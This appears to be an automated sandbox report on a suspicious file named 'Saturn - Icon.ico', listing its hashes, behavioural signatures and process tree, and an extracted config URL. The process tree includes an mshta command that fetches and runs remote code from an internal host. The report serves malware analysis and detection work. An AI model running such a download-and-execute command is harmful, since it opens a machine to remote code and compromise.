Analysis
-
max time kernel
221s -
max time network
224s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
03-04-2023 21:33
General
-
Target
Saturn - Icon.ico
-
Size
4KB
-
MD5
aea4e29119b6b140a2ba9d99c0c78316
-
SHA1
348486ce37c69c5204af0362e19dfd5691b5a817
-
SHA256
2051fdcc57536ef32572aaacf924fec46ebe8d43a09199e4e8230f489a959e0b
-
SHA512
d73eb2ea0c6eaacb1b909ef8b208641ef407a1326dbeeb1ffac4ffd2249c5cb1cc3de392cbc13989303938c7aa027649988d649a2b493a5cc7a47b1fe546f359
-
SSDEEP
24:subEH6uR+5CnVbsFCc/4a7ESvXbXmHQ90wP3smyUmzgioeTMhatD6q+xiz:dEDRGCVbsFC5a7EM6wrP8NUMRTNz
Malware Config
Extracted
http://192.168.0.5:9999/XM01C
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen "C:\Users\Admin\AppData\Local\Temp\Saturn - Icon.ico"1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://192.168.0.5:9999/XM01C2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S7FIT0B8\XM01C[1]"3⤵
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5441⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
181B
MD568f9139482fcf8c77c42a51bd89802c1
SHA1e44e8a743b07a0c3b37b5c2851ad35aa5da6f639
SHA256acb08f0713744d9f52b3c01926f5ef17b18dd1ba10f9a4c39934436fc6f82cbc
SHA512ad47c89bc9a433b4a0a0006002b90553ad4ecaaf4072945876667d4619d5570948c88b0939354054aaca680984e449bc9fb1b3b6e4d33ed5c8cde46ea1b49ec7
-
Filesize
4KB
-
Filesize
4KB